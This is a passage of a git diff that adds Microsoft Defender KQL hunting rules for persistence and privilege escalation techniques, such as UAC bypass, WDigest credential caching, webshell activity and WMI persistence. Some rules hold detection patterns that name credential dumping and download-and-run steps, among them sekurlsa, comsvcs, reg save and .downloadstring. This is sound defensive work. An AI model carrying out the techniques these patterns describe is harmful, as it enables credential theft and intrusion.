RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM" \ No newline at end of file diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql new file mode 100644 index 00000000..a0f6f88c --- /dev/null +++ b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql @@ -0,0 +1,14 @@ +// Title: Trusted Path Bypass via Windows Directory Spoofing +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-17 +// Level: high +// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. +This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath contains ":\\Windows \\System32\\" or FolderPath contains ":\\Windows \\SysWOW64\\" \ No newline at end of file diff --git a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql new file mode 100644 index 00000000..47262b30 --- /dev/null +++ b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql @@ -0,0 +1,12 @@ +// Title: UAC Bypass With Fake DLL +// Author: oscd.community, Dmitry Uchakin +// Date: 2020-10-06 +// Level: high +// Description: Attempts to load dismcore.dll after dropping it +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001 +// False Positives: +// - Actions of a legitimate telnet client + +DeviceImageLoadEvents +| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll")) \ No newline at end of file diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql new file mode 100644 index 00000000..bac7ab41 --- /dev/null +++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql @@ -0,0 +1,12 @@ +// Title: UEFI Persistence Via Wpbbin - FileCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-18 +// Level: high +// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001 +// False Positives: +// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) + +DeviceFileEvents +| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql new file mode 100644 index 00000000..231706a3 --- /dev/null +++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql @@ -0,0 +1,12 @@ +// Title: UEFI Persistence Via Wpbbin - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-18 +// Level: high +// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001 +// False Positives: +// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) + +DeviceProcessEvents +| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql new file mode 100644 index 00000000..e0664bca --- /dev/null +++ b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql @@ -0,0 +1,12 @@ +// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: medium +// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. +Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql new file mode 100644 index 00000000..b59815c2 --- /dev/null +++ b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql @@ -0,0 +1,12 @@ +// Title: Uncommon Microsoft Office Trusted Location Added +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Other unknown legitimate or custom paths need to be filtered to avoid false positives + +DeviceRegistryEvents +| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql new file mode 100644 index 00000000..3365d1b6 --- /dev/null +++ b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql @@ -0,0 +1,12 @@ +// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-31 +// Level: medium +// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion +// False Positives: +// - Installation of unsigned packages for testing purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql new file mode 100644 index 00000000..f7232a32 --- /dev/null +++ b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql @@ -0,0 +1,10 @@ +// Title: Unusual Child Process of dns.exe +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql new file mode 100644 index 00000000..99b3535d --- /dev/null +++ b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql @@ -0,0 +1,10 @@ +// Title: Unusual File Deletion by Dns.exe +// Author: Tim Rauch (Nextron Systems), Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log")) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql new file mode 100644 index 00000000..14db39a0 --- /dev/null +++ b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql @@ -0,0 +1,10 @@ +// Title: Unusual File Modification by dns.exe +// Author: Tim Rauch (Nextron Systems), Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log")) \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql new file mode 100644 index 00000000..51f4164f --- /dev/null +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql @@ -0,0 +1,12 @@ +// Title: User Added To Admin Group Via Dscl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-03-19 +// Level: medium +// Description: Detects attempts to create and add an account to the admin group via "dscl" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " -append " and ProcessCommandLine contains " /Groups/admin " and ProcessCommandLine contains " GroupMembership ") and FolderPath endswith "/dscl" \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql new file mode 100644 index 00000000..74d485a9 --- /dev/null +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql @@ -0,0 +1,12 @@ +// Title: User Added To Admin Group Via DseditGroup +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-08-22 +// Level: medium +// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " -o edit " and ProcessCommandLine contains " -a " and ProcessCommandLine contains " -t user" and ProcessCommandLine contains "admin") and FolderPath endswith "/dseditgroup" \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql new file mode 100644 index 00000000..a3602473 --- /dev/null +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql @@ -0,0 +1,12 @@ +// Title: User Added To Admin Group Via Sysadminctl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-03-19 +// Level: medium +// Description: Detects attempts to create and add an account to the admin group via "sysadminctl" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " -addUser " and ProcessCommandLine contains " -admin ") and FolderPath endswith "/sysadminctl" \ No newline at end of file diff --git a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql new file mode 100644 index 00000000..c6371aa8 --- /dev/null +++ b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql @@ -0,0 +1,12 @@ +// Title: VsCode Powershell Profile Modification +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: medium +// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 +// False Positives: +// - Legitimate use of the profile by developers or administrators + +DeviceFileEvents +| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1" \ No newline at end of file diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql new file mode 100644 index 00000000..d6174c64 --- /dev/null +++ b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql @@ -0,0 +1,13 @@ +// Title: Wdigest CredGuard Registry Modification +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-08-25 +// Level: high +// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from +HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. +This is usually used with UseLogonCredential to manipulate the caching credentials. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "\\IsCredGuardEnabled" \ No newline at end of file diff --git a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql new file mode 100644 index 00000000..9b1e6ee7 --- /dev/null +++ b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql @@ -0,0 +1,10 @@ +// Title: Wdigest Enable UseLogonCredential +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-09-12 +// Level: high +// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential" \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql new file mode 100644 index 00000000..ff9af79d --- /dev/null +++ b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql @@ -0,0 +1,10 @@ +// Title: Webshell Detection With Command Line Keywords +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson +// Date: 2017-01-01 +// Level: high +// Description: Detects certain command line parameters often used during reconnaissance activity via web shells +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or ((ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " -windowstyle hidden" or ProcessCommandLine contains ".WebClient).Download") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql new file mode 100644 index 00000000..f3b27cb8 --- /dev/null +++ b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql @@ -0,0 +1,13 @@ +// Title: Webshell Hacking Activity Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-17 +// Level: high +// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv")) \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql new file mode 100644 index 00000000..f94bdfd8 --- /dev/null +++ b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql @@ -0,0 +1,11 @@ +// Title: Webshell Tool Reconnaissance Activity +// Author: Cian Heasley, Florian Roth (Nextron Systems) +// Date: 2020-07-22 +// Level: high +// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help") \ No newline at end of file diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql new file mode 100644 index 00000000..14eacb11 --- /dev/null +++ b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql @@ -0,0 +1,15 @@ +// Title: Winlogon AllowMultipleTSSessions Enable +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects when the 'AllowMultipleTSSessions' value is enabled. +Which allows for multiple Remote Desktop connection sessions to be opened at once. +This is often used by attacker as a way to connect to an RDP session without disconnecting the other users + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of the multi session functionality + +DeviceRegistryEvents +| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions" \ No newline at end of file diff --git a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql new file mode 100644 index 00000000..079f9503 --- /dev/null +++ b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql @@ -0,0 +1,13 @@ +// Title: WMI Persistence - Script Event Consumer +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: medium +// Description: Detects WMI script event consumers +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 +// False Positives: +// - Legitimate event consumers +// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button + +DeviceProcessEvents +| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/wmi_persistence_security.kql b/KQL/rules/Persistence/wmi_persistence_security.kql new file mode 100644 index 00000000..2deec1c8 --- /dev/null +++ b/KQL/rules/Persistence/wmi_persistence_security.kql @@ -0,0 +1,12 @@ +// Title: WMI Persistence - Security +// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community +// Date: 2017-08-22 +// Level: medium +// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 +// False Positives: +// - Unknown (data set is too small; further testing needed) + +DeviceRegistryEvents +| where RegistryKey contains "subscription" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql new file mode 100644 index 00000000..fca1812a --- /dev/null +++ b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql @@ -0,0 +1,12 @@ +// Title: Add Port Monitor Persistence in Registry +// Author: frack113 +// Date: 2021-12-30 +// Level: medium +// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. +A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 + +DeviceRegistryEvents +| where (RegistryValueData endswith ".dll" and RegistryKey endswith "\\Control\\Print\\Monitors*") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey endswith "Control\\Print\\Environments*" and RegistryKey endswith "\\Drivers*" and RegistryKey contains "\\VNC Printer")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql new file mode 100644 index 00000000..9f38fa73 --- /dev/null +++ b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql @@ -0,0 +1,10 @@ +// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: high +// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")) and (not(InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql new file mode 100644 index 00000000..b7df7feb --- /dev/null +++ b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql @@ -0,0 +1,12 @@ +// Title: Atbroker Registry Change +// Author: Mateusz Wydra, oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547 +// False Positives: +// - Creation of non-default, legitimate at usage + +DeviceRegistryEvents +| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql new file mode 100644 index 00000000..6a8ba99c --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql @@ -0,0 +1,10 @@ +// Title: Bypass UAC Using DelegateExecute +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Bypasses User Account Control using a fileless method +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute" \ No newline 